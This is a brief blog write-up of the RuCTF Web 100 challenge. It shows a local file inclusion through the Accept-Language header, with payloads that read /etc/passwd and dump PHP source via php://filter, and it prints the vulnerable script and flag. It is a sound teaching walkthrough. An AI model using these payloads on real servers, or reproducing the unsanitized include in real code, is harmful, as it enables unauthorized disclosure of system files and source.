March 19, 2014

RuCTF: Web 100 (php)

The page shows some text from wikipedia (or from somewhere else, I don't care), the interesting thing is that it shows "Language was detect automatically :)" in the end of the text.
It seems like a hint, so let's try to use Accept-Language header.
First of all, set Accept-language to ru/en, the page will change according to the language selected.
So, let's test it for LFI with Accept-language: /etc/passwd, it will show the contents of /etc/passwd!
But there is nothing interesting in /etc/passwd, so let's get the source of the script itself with Accept-language: php://filter/convert.base64-encode/resource=index.php
After decoding base64 we can get the source of script:
<!doctype html>
<html>
<head>
  <style type="text/css">
    pre { width: 640px; white-space: normal; text-align: justify;};
  </style>
</head>
<body>
<center>
<h2>CTF</h2>
<?php
  header('Content-Type: text/html; charset=utf-8');
  $flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';
  $ok   = 0;
  foreach(explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $s) {
    $l = explode(';', $s)[0];
    if (include $l) {
      $ok = 1;
      break;
    }
  }
  if (!$ok) {
    include 'en';
    echo 'Language was not detect automatically :(';
  } else {
    echo 'Language was detect automatically :)';
  }
?>
<center>
</body>
</html> 
The flag is 5cf27d9bad2fe9d96d2bcf25c3b0bd14

No comments:

Post a Comment